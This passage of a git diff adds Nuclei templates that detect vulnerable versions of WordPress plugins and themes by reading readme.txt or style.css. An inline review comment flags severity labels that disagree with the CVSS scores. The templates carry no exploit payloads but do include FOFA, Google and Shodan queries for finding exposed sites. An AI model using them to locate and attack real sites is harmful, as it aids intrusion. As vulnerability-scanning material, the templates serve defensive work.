6.2-revision-5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43248.yaml b/poc/cve/CVE-2024-43248.yaml new file mode 100644 index 0000000000..7066b82ae1 --- /dev/null +++ b/poc/cve/CVE-2024-43248.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43248 + +info: + name: > + Bit Form Pro <= 2.6.4 - Unauthenticated Arbitrary File Deletion + author: topscoder + severity: critical + description: > + The Bit Form Pro plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 2.6.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7a09288c-b8de-4674-9f96-d26ff3c7d917?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43248 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43248' + tags: cve,wordpress,wp-plugin,bitformpro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43249.yaml b/poc/cve/CVE-2024-43249.yaml new file mode 100644 index 0000000000..f908d9cdb8 --- /dev/null +++ b/poc/cve/CVE-2024-43249.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43249 + +info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Bit Form Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6d3b9d15-f6a9-4d1c-ada5-8c48add839a2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43249 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43249' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43250.yaml b/poc/cve/CVE-2024-43250.yaml new file mode 100644 index 0000000000..149e9593cf --- /dev/null +++ b/poc/cve/CVE-2024-43250.yaml 
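Review bot: `severity: low` sits next to `cvss-score: 8.8` (C:H/I:H/A:H) here, and the same value is echoed as the last entry of `tags`, so anyone filtering by `-severity` or by tag will skip a finding that CVSS places in the High band. The field does not track the score elsewhere in this chunk either: CVE-2024-43250 is 8.8 with `low`, CVE-2024-43253 is 5.3 with `high` while CVE-2024-43258 and CVE-2024-43259 are 5.3 with `medium`, CVE-2024-43262 is 6.4 with `low`, and CVE-2024-43242 and CVE-2024-43252 are 8.1 with `critical`. If the intent is to rate by required privilege rather than by CVSS, a comment on the field such as `# severity reflects Wordfence rating, not the CVSS band` would make that explicit; otherwise deriving it from the score (here `severity: high`, and the matching tag) keeps the two fields consistent.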
@@ -0,0 +1,59 @@ +id: CVE-2024-43250 + +info: + name: > + Bit Form Pro <= 2.6.4 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The Bit Form Pro plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/525a2180-3643-4f78-aafd-99a546bac363?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43250 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43250' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43251.yaml b/poc/cve/CVE-2024-43251.yaml new file mode 100644 index 0000000000..64219453b6 --- /dev/null +++ b/poc/cve/CVE-2024-43251.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43251 + +info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + The bitformpro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efa646ee-ebee-4528-a421-09ee3dc8275a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43251 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43251' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43252.yaml b/poc/cve/CVE-2024-43252.yaml new file mode 100644 index 0000000000..4caa21df6d --- /dev/null +++ b/poc/cve/CVE-2024-43252.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43252 + +info: + name: > + Crew HRM <= 1.1.1 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Employee, Leave and Recruitment Management System – Crew HRM plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e3d47-cae3-46a6-9b60-ad1eb6b7ced7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43252 + metadata: + fofa-query: "wp-content/plugins/hr-management/" + google-query: inurl:"/wp-content/plugins/hr-management/" + shodan-query: 'vuln:CVE-2024-43252' + tags: cve,wordpress,wp-plugin,hr-management,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hr-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hr-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43253.yaml b/poc/cve/CVE-2024-43253.yaml new file mode 100644 index 0000000000..5bf4ddc27d --- /dev/null +++ b/poc/cve/CVE-2024-43253.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43253 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: high + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/195788de-129e-4112-bcab-a7835c8164ca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43253 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-43253' + tags: cve,wordpress,wp-plugin,clover-online-orders,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43254.yaml b/poc/cve/CVE-2024-43254.yaml new file mode 100644 index 0000000000..48c52e1a86 --- /dev/null +++ b/poc/cve/CVE-2024-43254.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43254 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: low + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/34d990b6-3021-45d4-9ecd-cfabb7fbc96c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43254 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-43254' + tags: cve,wordpress,wp-plugin,clover-online-orders,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43255.yaml b/poc/cve/CVE-2024-43255.yaml new file mode 100644 index 0000000000..9cf5b31749 --- /dev/null +++ b/poc/cve/CVE-2024-43255.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43255 + +info: + name: > + MyBookTable Bookstore <= 3.3.9 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The MyBookTable Bookstore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.3.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b614aab2-a3e3-410a-917b-cc33634503ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43255 + metadata: + fofa-query: "wp-content/plugins/mybooktable/" + google-query: inurl:"/wp-content/plugins/mybooktable/" + shodan-query: 'vuln:CVE-2024-43255' + tags: cve,wordpress,wp-plugin,mybooktable,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mybooktable/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mybooktable" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43256.yaml b/poc/cve/CVE-2024-43256.yaml new file mode 100644 index 0000000000..212d0ac475 --- /dev/null +++ b/poc/cve/CVE-2024-43256.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43256 + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.36. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/35b1fb1a-a12c-4938-a2d2-74e291db76ef?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43256 + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:CVE-2024-43256' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43257.yaml b/poc/cve/CVE-2024-43257.yaml new file mode 100644 index 0000000000..4b7d4c3569 --- /dev/null +++ b/poc/cve/CVE-2024-43257.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43257 + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.36. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/00aba7b3-4d4a-4aba-8e4e-2e8a928f6143?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43257 + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:CVE-2024-43257' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43258.yaml b/poc/cve/CVE-2024-43258.yaml new file mode 100644 index 0000000000..693d65b113 --- /dev/null +++ b/poc/cve/CVE-2024-43258.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43258 + +info: + name: > + Store Locator Plus <= 2311.17.01 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Store Locator Plus® for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2311.17.01. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3597fa-71e2-4753-b226-5d95e576947a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43258 + metadata: + fofa-query: "wp-content/plugins/store-locator-le/" + google-query: inurl:"/wp-content/plugins/store-locator-le/" + shodan-query: 'vuln:CVE-2024-43258' + tags: cve,wordpress,wp-plugin,store-locator-le,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/store-locator-le/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "store-locator-le" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2311.17.01') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43259.yaml b/poc/cve/CVE-2024-43259.yaml new file mode 100644 index 0000000000..700be973c1 --- /dev/null +++ b/poc/cve/CVE-2024-43259.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43259 + +info: + name: > + Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Order Export for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.23. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e3f8108-6b1b-4720-a450-e58b1833b608?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43259 + metadata: + fofa-query: "wp-content/plugins/order-export-and-more-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/order-export-and-more-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-43259' + tags: cve,wordpress,wp-plugin,order-export-and-more-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/order-export-and-more-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "order-export-and-more-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43260.yaml b/poc/cve/CVE-2024-43260.yaml new file mode 100644 index 0000000000..fb5effde5d --- /dev/null +++ b/poc/cve/CVE-2024-43260.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43260 + +info: + name: > + Clearfy Cache <= 2.2.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc29341-a23e-4694-b852-90794c01473a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43260 + metadata: + fofa-query: "wp-content/plugins/clearfy/" + google-query: inurl:"/wp-content/plugins/clearfy/" + shodan-query: 'vuln:CVE-2024-43260' + tags: cve,wordpress,wp-plugin,clearfy,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clearfy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clearfy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43261.yaml b/poc/cve/CVE-2024-43261.yaml new file mode 100644 index 0000000000..99aaefb5c0 --- /dev/null +++ b/poc/cve/CVE-2024-43261.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43261 + +info: + name: > + Compute Links <= 1.2.1 - Unauthenticated Remote File Inclusion + author: topscoder + severity: critical + description: > + The Compute Links plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2b78e0-1b82-4074-8051-e44dcfe3ac51?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43261 + metadata: + fofa-query: "wp-content/plugins/compute-links/" + google-query: inurl:"/wp-content/plugins/compute-links/" + shodan-query: 'vuln:CVE-2024-43261' + tags: cve,wordpress,wp-plugin,compute-links,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/compute-links/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "compute-links" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43262.yaml b/poc/cve/CVE-2024-43262.yaml new file mode 100644 index 0000000000..9cb82daca8 --- /dev/null +++ b/poc/cve/CVE-2024-43262.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43262 + +info: + name: > + Busiprof <= 2.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Busiprof theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0acf3219-1443-42cc-b3c9-cffb8fd8af07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43262 + metadata: + fofa-query: "wp-content/themes/busiprof/" + google-query: inurl:"/wp-content/themes/busiprof/" + shodan-query: 'vuln:CVE-2024-43262' + tags: cve,wordpress,wp-theme,busiprof,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/busiprof/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "busiprof" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43263.yaml b/poc/cve/CVE-2024-43263.yaml new file mode 100644 index 0000000000..24c1567fec --- /dev/null +++ b/poc/cve/CVE-2024-43263.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43263 + +info: + name: > + Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Visual Composer Starter theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43263 + metadata: + fofa-query: "wp-content/themes/visual-composer-starter/" + google-query: inurl:"/wp-content/themes/visual-composer-starter/" + shodan-query: 'vuln:CVE-2024-43263' + tags: cve,wordpress,wp-theme,visual-composer-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-composer-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43264.yaml b/poc/cve/CVE-2024-43264.yaml new file mode 100644 index 0000000000..b9d3f6b71c --- /dev/null +++ b/poc/cve/CVE-2024-43264.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43264 + +info: + name: > + Create by Mediavine <= 1.9.8 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Create by Mediavine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.8. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c04e40a-6d94-4688-9159-07bf27a9efe0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43264 + metadata: + fofa-query: "wp-content/plugins/mediavine-create/" + google-query: inurl:"/wp-content/plugins/mediavine-create/" + shodan-query: 'vuln:CVE-2024-43264' + tags: cve,wordpress,wp-plugin,mediavine-create,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mediavine-create/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mediavine-create" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43265.yaml b/poc/cve/CVE-2024-43265.yaml new file mode 100644 index 0000000000..19a21758b8 --- /dev/null +++ b/poc/cve/CVE-2024-43265.yaml 
